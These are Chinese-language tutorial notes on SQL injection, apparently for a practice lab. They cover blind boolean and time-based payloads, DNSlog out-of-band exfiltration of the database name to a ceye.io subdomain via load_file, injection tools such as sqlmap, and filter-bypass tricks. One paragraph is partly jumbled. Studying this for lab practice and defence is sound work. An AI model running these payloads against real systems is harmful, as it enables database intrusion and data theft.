SQL初步注入

十二.伪静态注入

伪静态的网站一般在url中存在数字

十三.盲注(布尔型SQL盲注、时间型SQL盲注)

1.布尔型盲注

vince' and  ascii(substr(database(),1,1))=112#'

通过这个方法，就能得到后台数据库的名称的第一个字符的 ascii码,不断测试得出数据库名称

布尔型盲注基本都是通过ascii码来测试的

2.时间型盲注

基于时间的延迟，构造一个拼接语句： vince' and if(substr(database(),1,1)='X' (猜测 vince' and if(substr(database(),1,1)='p',sleep(10),null)# ,在web控制台下，判断出 点)',sleep(10),null# ，输入后，如果猜测真确，那么就会响应10秒，如果错误会立刻返回错误。输 入： database的表名的一个字符为p。通过这个办法我们就能逐步向下获取数据。判断猜解

时间型盲注经常使用的函数： sleep(5)、benchmark(10000000,MD5(1)) benchmark是mysql的内置 函数，是将MD5(1)执行10000000次以达到延迟的效果

十四.DNSlog注入

条件：

1、需要mysql用户具备读文件的权限，因为要借助到mysql的load_file读取文件的函数，权限不够的 话，不能调用这个函数。其实只要mysql中配置项中开启了这个secure_file_priv配置，就可以通过sql语 句来执行文件读写操作。

2、目标mysql数据库服务器能够访问外网 其实load_file()不仅能够加载本地文件，同时也能对诸如 \www.jaden.com 这样的URL发起请求。这样 的url我们称之为UNC路径，简单了解即可。就借助load_file函数能够访问某个网址的特性，来进行 DNSlog注入

select * from member where id=1 and (select load_file(concat('\\\\',(select  database()),'.9fqiop.ceye.io\\abc')))

工具:
​
https://github.com/ADOOO/DnslogSqlinj
​
​

十五.SQL工具测试

萝卜头(了解)

Pangolin(穿山甲)

sqlmap(重点)

十六.防御绕过

前端绕过

bp抓包修改后再放包即可绕过

后端绕过

情况一绕过：大小写绕过：SELECT * FROM USERS；

情况二绕过：双写：selselectect * from users; 其实str_replace只替换了一次select还剩下一个select

情况三：强防御，这种的很难绕过了，因为我们写的注入语句都是字符串，针对提交数据为纯数字的时 候，这种防御就很难绕过了，但是好多时候，用户正常向后台提交的数据都是非数字类型的，这样的话 就不会进行intval()的加工，就可以尝试其他注入手法。

情况四：开启了魔术符号转义功能，这种的参看我们前面说的宽字节注入、二次注入等